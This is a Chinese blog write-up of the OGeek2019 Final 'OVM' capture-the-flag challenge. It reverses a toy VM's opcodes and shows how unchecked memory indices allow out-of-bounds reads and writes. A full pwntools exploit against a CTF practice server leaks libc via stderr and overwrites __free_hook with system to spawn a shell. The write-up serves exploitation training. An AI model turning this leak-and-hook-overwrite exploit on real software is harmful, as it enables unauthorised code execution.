[OGeek2019 Final]OVM(简易虚拟机逃逸)

已于 2022-10-17 08:57:13 修改
阅读量703 收藏
点赞数
分类专栏: PWN 文章标签: pwn
于 2022-10-16 23:35:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/127354652
版权

目录

前言:

对vm pwn这类题型还没怎么了解,找了一道[OGeek2019 Final]OVM,入个门先

前置知识:

先引用一波https://www.anquanke.com/post/id/208450#h2-1

虚拟机保护的题目相比于普通的pwn题逆向量要大许多,需要分析出分析出不同的opcode的功能再从中找出漏洞,实际上,vmpwn的大部分工作量都在逆向中,能分析出虚拟指令集的功能实现,要做出这道题也比较容易了。
1.虚拟机保护技术 所谓虚拟机保护技术,是指将代码翻译为机器和人都无法识别的一串伪代码字节流;在具体执行时再对这些伪代码进行一一翻译解释,逐步还原为原始代码并执行。这段用于翻译伪代码并负责具体执行的子程序就叫作虚拟机VM(好似一个抽象的CPU)。它以一个函数的形式存在,函数的参数就是字节码的内存地址。

2.VStartVM 虚拟机的入口函数,对虚拟机环境进行初始化

3.VMDispather 解释opcode,并选择对应的Handler函数执行,当Handler执行完后会跳回这里,形成一个循环

4.opcode 程序可执行代码转换成的操作码

然后基本上漏洞都是数组越界,解题的话要知道opcode,对指令要逐个逆向解析。

例题:[OGeek2019 Final]OVM

程序分析:

保护就canary没开

程序先要求输入pc,sp,codesize,
请添加图片描述
然后会要求我们输入code命令,循环输入次数是codesize的值请添加图片描述

循环完我们的指令后,会读指令,执行指令,结束后有往bss段的comment里存的堆的地址里读0x8c个字节,最后free掉堆的内存

重点看这个execute这个执行指令的函数
请添加图片描述
从这里可以判断出这个指令的格式

opcode |目的寄存器| 寄存器1 | 寄存器2

后续的代码就是根据opcode来执行指定操作

解析后大致是这样

mov reg, src2		 	0x10 : reg[dest] = src2
mov reg, 0				0x20 : reg[dest] = 0
mov mem, reg            0x30 : reg[dest] = memory[reg[src2]]
mov reg, mem            0x40 : memory[reg[src2]] = reg[dest]
push reg                0x50 : stack[result] = reg[dest]
pop reg                 0x60 : reg[dest] = stack[reg[13]]
add                     0x70 : reg[dest] = reg[src2] + reg[src1]
sub                     0x80 : reg[dest] = reg[src1] - reg[src2]
and                     0x90 : reg[dest] = reg[src2] & reg[src1]
or                      0xA0 : reg[dest] = reg[src2] | reg[src1]
^          	        	0xB0 : reg[dest] = reg[src2] ^ reg[src1]
left                    0xC0 : reg[dest] = reg[src1] << reg[src2]
right                   0xD0 : reg[dest] = reg[src1] >> reg[src2]
                        0xFF : (exit or print) if(reg[13] != 0) print oper

漏洞点:两个数组越界

0x30里的赋值内存操作,memory的index没有任何检测,可以数组越界,
配合0xff的print功能可以造成地址泄露
请添加图片描述
离memory最近的就是stderr,可以填负数然后print泄露stderr(数组越界常规操作了)
请添加图片描述
请添加图片描述
然后0x40 是往地址里写值的操作,也是没有任何检测,可以任意地址写

请添加图片描述
值得注意的是寄存器都是4字节的,要分两次来读写

利用思路:

1.先任意读把stderr的地址,分高低地址读到两个寄存器中
2.gdb调试出freehook于stderr的固定偏移,我们改存stderr低地址的寄存器+固定偏移就是freehook的低地址
3.任意写把bss段comment存的堆地址改写为free_hook地址-8
4.执行print功能泄露地址,算出libc_base,得出system
5.接着的read会往free_hook地址-8读0x8c,我们只要填’/bin/sh\x00’+p64(system),
最后free时就会执行system(’/bin/sh’)
(exp里有寄存器的具体解析,然后指令数还可以短,不过也没必要啦)

exp:

from pwn import * 
local_file  = './pwn'
local_libc  = '/lib/x86_64-linux-gnu/libc.so.6'
remote_libc = './libc-2.23.so'
select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
elif select == 1:
    r = remote('node4.buuoj.cn',25244 )
    libc = ELF(remote_libc)
else:
    r = gdb.debug(local_file)
    libc = ELF(local_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
     gdb.attach(r,cmd)
#------------------------
def opcode(code, dst, op1, op2):
    res = code<<24
    res += dst<<16
    res += op1<<8
    res += op2
    return str(res)
#---------------------------
'''
mov reg, src2		0x10 : reg[dest] = src2
mov reg, 0		0x20 : reg[dest] = 0
mov mem, reg            0x30 : reg[dest] = memory[reg[src2]]
mov reg, mem            0x40 : memory[reg[src2]] = reg[dest]
push reg                0x50 : stack[result] = reg[dest]
pop reg                 0x60 : reg[dest] = stack[reg[13]]
add                     0x70 : reg[dest] = reg[src2] + reg[src1]
sub                     0x80 : reg[dest] = reg[src1] - reg[src2]
and                     0x90 : reg[dest] = reg[src2] & reg[src1]
or                      0xA0 : reg[dest] = reg[src2] | reg[src1]
^          	        0xB0 : reg[dest] = reg[src2] ^ reg[src1]
left                    0xC0 : reg[dest] = reg[src1] << reg[src2]
right                   0xD0 : reg[dest] = reg[src1] >> reg[src2]
                        0xFF : (exit or print) if(reg[13] != 0) print oper
'''
sla('PCPC: ','0')
sla('SP: ','1')
sla('CODE SIZE: ',str(21))
ru('CODE: ')
#-------leak_stderr----------
sl(opcode(0x10,0,0,26)) #reg[0]=26
sl(opcode(0x80,1,1,0))  #reg[1]=26-reg[0]=-26
sl(opcode(0x30,2,0,1))  #reg[2]=memery[reg[1]]=low stderr
sl(opcode(0x10,0,0,25)) #reg[0]=25
sl(opcode(0x80,1,1,0))  #reg[1]=26-reg[0]=-25
sl(opcode(0x30,3,0,1))  #reg[3]=memery[reg[1]]=high stderr
#gdb: __free_hook-stderr=0x7ffff7dcf8e8-0x7ffff7dce840=0x10a8
#--------get 0x10a8-8---------
sl(opcode(0x10,0,0,1))  #reg[0]=1
sl(opcode(0x10,1,0,12)) #reg[1]=12
sl(opcode(0xc0,4,0,1))  #reg[4]=reg[0]<<reg[1]=1<<12=0x1000
sl(opcode(0x10,5,0,0xa0))#reg[5]=0xa0
sl(opcode(0x70,6,4,5))  #reg[6]=reg[5]+reg[4]=0x10a0
sl(opcode(0x70,4,6,2))  #reg[4]=reg[6]+reg[2]=free_hook-8      now 234 is addr,not change
#--------write_comment=free_hook-8----------------
#(memory-comment)/4=8
sl(opcode(0x10,0,0,8)) #reg[0]=8
sl(opcode(0x10,1,0,0)) #reg[1]=0
sl(opcode(0x80,5,1,0)) #reg[5]=reg[1]-reg[0]=0-8=-8
sl(opcode(0x40,4,0,5)) #memory[reg[5]]=memory[-8]=comment=reg[4]=low free_hook-8
sl(opcode(0x10,0,0,7)) #reg[0]=7
sl(opcode(0x10,1,0,0)) #reg[1]=0
sl(opcode(0x80,5,1,0)) #reg[5]=reg[1]-reg[0]=0-7=-7
sl(opcode(0x40,3,0,5)) #memory[reg[5]]=memory[-7]=comment=reg[3]=high stderr=high free_hook
sl(opcode(0xff,0,0,0))
#----------------------------------------------------
ru('R3: ')
high_addr=int(rc(4),16)
info('high_addr',high_addr)
ru('R4: ')
low_addr=int(rc(8),16)
info('low_addr',low_addr)
free_hook=high_addr*(2**32)+low_addr+8
libc_base=free_hook-libc.sym['__free_hook']
info('libc_base',libc_base)
system=libc_base+libc.sym['system']
sl('/bin/sh\x00'+p64(system))
r.interactive()
Nq0inaen
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Oracle OVM虚拟机软件及管理介绍
10-16
目前云计算很热门,而虚拟化是实现云计算的手段之一。这里的虚拟化,主要指的是...Oracle同样提供了企业级基础架构虚拟化的解决方案,这就是OVM,Oracle虚拟机,本文介绍了Oracle OVM的一些特性和管理实施。供参考。
[OGeek2019 Final]OVM——详细入门VM pwn
fzucaicai的博客
08-06 850
仔细分析代码都可以发现,这些操作都没有对数组的下标进行检查,这样会导致什么后果呢,举个例子,如果有一个重要数据B存在数组array[10]的内存前面,如果不对数组的下标进行检查的话,那么我就可以构造array[-1]并输出,就可以得到B的内容了。也就是说,我们给程序输入一串指令,这个程序会有自己独特的,对代码的理解,并进行像分解成机器码那样,执行,而像寄存器,栈空间,存储空间都是程序自己设计的,而不是系统分配的。这两个条件判断语句的目的是确保在进行内存释放操作之前,所提供的指针和大小都是有效的。
[OGeek2019 Final]OVM
weixin_52878095的博客
03-19 3858
静态分析 拿到目后第一件事先检查程序的保护机制 看到程序除了canary保护以为,其他保护都开了,丢到IDA里面静态分析,程序先是为comment参数分配了一块0x8c大小的内存,然后让我们输入指令起始位置和栈起始位置,然后将指令起始位置赋值给reg[13],将栈起始位置赋值给reg[15],而且指令的数量不能大于0x10000,然后就是需要我们一条一条输入指令,输入完毕后就读取指令并执行,最后会有一个向comment中写入数据然后调用sendcomment函数 然后我们分别看一下fetch() /
VMware 逃逸基础知识
sky123博客
06-19 2196
运行在 VMM 上的程序必须和原始硬件运行一样,需要高效。大部分指令必须直接在真实的处理器上运行,而不需要解释每条指令VMM 必须完全控制硬件,任何 VM 不能穿越 VMM 直接控制硬件。
[OGeek2019 Final]OVM(简易虚拟机逃逸)
seaaseesa的博客
05-01 1135
[OGeek2019 Final]OVM 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,是一个虚拟机 其中,这里这条mov reg的指令比较重要 还有这里mov memory的指令也比较重要 这里两处,都存在下标越界,通过查看汇编指令可知,memory和reg都是有符号的数据数组。 因此,利用reg[out] = memory[-X],可以向上越界,将数...
VMPWN
Amalllの博客
11-11 1023
1.虚拟机保护技术 所谓虚拟机保护技术,是指将代码翻译为机器和人都无法识别的一串伪代码字节流;在具体执行时再对这些伪代码进行一一翻译解释,逐步还原为原始代码并执行。这段用于翻译伪代码并负责具体执行的子程序就叫作虚拟机VM(好似一个抽象的CPU)。它以一个函数的形式存在,函数的参数就是字节码的内存地址。 2.VStartVM 虚拟机的入口函数,对虚拟机环境进行初始化 3.VMDispather 解释opcode,并选择对应的Handler函数执行,当Handler执行完后会跳回这里,形成一个循环
ovm7690.rar_OVm7690
09-23
ovm7690,video tracking device
ovm_register-1.0beta7.tar.gz_ovm
09-22
OVM register kit used to develop verification IPs
ovm_idm.zip_IDM 和 OVM_OVM模型_courttw9_eastacd_iDM模型
07-14
基于 汽车跟驰模型OVM 和 IDM 的动态特性分析(2辆车)
OVM源代码分析之sequence机制.pdf
08-31
目 录 1 这是一个什么样的故事...........................................................................................................6 2 这是关于谁的故事............................................
Antctf-vmpwn
03-15
Antctf-real_vmpwn写 该主通过对vmware dhcp组件进行了神奇的修改,介绍了旧版本中的cve-2020-3947 UAF漏洞和静默固定变量未初始化的漏洞。 此漏洞组合可能导致较低版本(<15.1.2)的实际转义,因此将该漏洞命名为real_vmpwn
VMPWN的入门系列-1
YJ_12340的博客
07-27 976
这是一道基础的VM相关目,VMPWN的入门级别目。前面提到VMPWN一般都是接收字节码然后对字节码进行解析,但是这道目不接受字节码,它接收字节码的更高一级语言:汇编。程序直接接收类似”mov”、”add”之类的指令,可以把这道目看作是一个执行汇编语言的处理器,相比于解析字节码的VM,逆向难度要大大减小。非常适合入门。
VMPWN入门
Stella_Leo的博客
08-25 662
title: vmpwn author: Ev3r date: 2021-08-19 20:28:14 tags: vmpwn categories: vmpwn vmpwn 当作一个vmpwn的入门了,一些设计基础先不谈了,直接来干货。 vmpwn常见设计 初始化分配模拟寄存器空间 初始化模拟栈空间 初始化分配模拟数据存储(buffer)空间 (data段) 初始化伪OPCODE空间 (text段) 常见流程 输入opcode 有一个分析器,循环分解我们输入的opcode来翻译出汇编指令,多为出.
OGeek_2019_Final OVM
lifanxin的博客
05-24 744
WP程序分析程序主逻辑分析虚拟机指令分析利用思路exp总结 程序分析   本目是一道典型的虚拟机目,通过这道目,我们可以学习一下VM pwn的分析技巧和利用思路。   该目程序和远程环境可以在buuoj上找到,下面老规矩先检查下程序信息,64位小端程序,没有开启栈保护。   做虚拟机pwn,我们可以分两大步骤进行,首先先分析一下这个程序是如何实现虚拟机功能的,也就是程序自身的大逻辑,然后我们再详细分析程序虚拟出来的指令,分析指令的过程可能会比较耗时,需要耐心。 程序主逻辑分析   我们首先来
CTF pwn虚拟机型详解
lifanxin的博客
05-24 1435
虚拟机型详解概述如何分析一个例子总结 概述   随着对pwn的学习,慢慢开始接触VM虚拟机pwn了,刚开始做这种类型的时会发现代码量比较大,略显复杂,复杂的部分主要是在用程序实现虚拟机指令那里。   其实这种做法和普通pwn类似,也是寻找漏洞,复杂的地方在于需要我们去分析出虚拟机实现的指令,然后用这些指令操作进行漏洞利用。 如何分析   接下来介绍下如何分析,对于VM类型的pwn,复杂的地方在于分析出该VM对应实现的指令,那么如何分析需要一定章法。这里需要简单知晓一些计算机组成原理和汇编语言的
VM pwn入门
weixin_44145820的博客
06-07 2032
VM pwn貌似是最近火起来的一类PWN。最近打的好几场比赛都出现了VM pwn目,正好在BUU上面遇到一道2019年的OGeek中出现的VM pwn,感觉应该会比较简单,另外听说高校战役里的EasyVM也是偏简单的VM pwn。本文就主要对这两道目进行分析。 [OGeek2019 Final]OVM 程序分析 作为VM pwn的第一步就是需要搞清楚指令的格式,操作码和操作数 本使用的是定长指令,一共32bits,每一个占8bits,但除了操作码能利用完8bits之外,寄存器只占4bits,
【八芒星计划】 VM PWN
carol2358的博客
09-01 464
这篇用来记录VM PWN 先申明本篇文章资料来源: https://blog.csdn.net/weixin_44145820/article/details/106600382 https://www.anquanke.com/post/id/208450#h2-1 https://xz.aliyun.com/t/6865 文章目录[OGeek2019 Final]OVM vm pwn最关键的就是逆向相关程序,理解每个指令的作用,漏洞大多数都是数组越界 先介绍一些基础的概念: 1.虚拟机保护技术 所谓
一道目入门VMpwn
qq_40712959的博客
04-16 318
一道目学习VMpwn 原理 VMpwn 程序通常都是模拟一套虚拟机,对用户输入的opcode进行解析,模拟程序的执行,故VMpwn常见设计如下: 初始化分配模拟寄存器空间(reg) 初始化分配模拟栈空间(stack) 初始化分配模拟数据存储空间(data) 初始化分配模拟机器指令(opcode)空间(text) [OGeek2019 Final]OVM 程序采用32bit定长指令,每个操作码、操作数均为8bit,其格式为: | opcode | dst | op1 | op2 | 程序具体指令参考
ovm candence
最新发布
10-21
OVM(Open Verification Methodology)是一种基于SystemVerilog的开放式验证方法学。它由Cadence公司推出,旨在提供一种灵活且可重用的验证框架,以提高验证工程师的效率和产品的质量。 OVM的核心理念是将验证环境和测试套件从设计中分离出来,以便更好地独立进行开发和重复使用。它提供了一套丰富的类库和规范,帮助验证工程师快速建立验证环境、生成验证用例、收集覆盖率信息等。同时,OVM还支持事务级建模(TLM)和统一验证语言(UVM),使得验证工程师能够更好地应对复杂的验证任务。 OVM的设计思想为可重用性和可扩展性提供了强大的支持。通过使用OVM,验证工程师可以轻松地构建可重用的验证环境模块,并通过组合这些模块来构建更复杂的验证系统。此外,OVM还提供了丰富的调试和报告机制,有助于验证工程师快速定位和解决问OVM与Cadence公司的其他工具相互兼容,使得验证工程师能够更加高效地使用这些工具进行验证。Cadence还提供了一系列的培训课程和文档,帮助验证工程师快速掌握和应用OVM。 总之,OVM是一个强大而灵活的验证方法学,可以帮助验证工程师提高工作效率、降低验证风险,并最终提供高质量的验证结果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值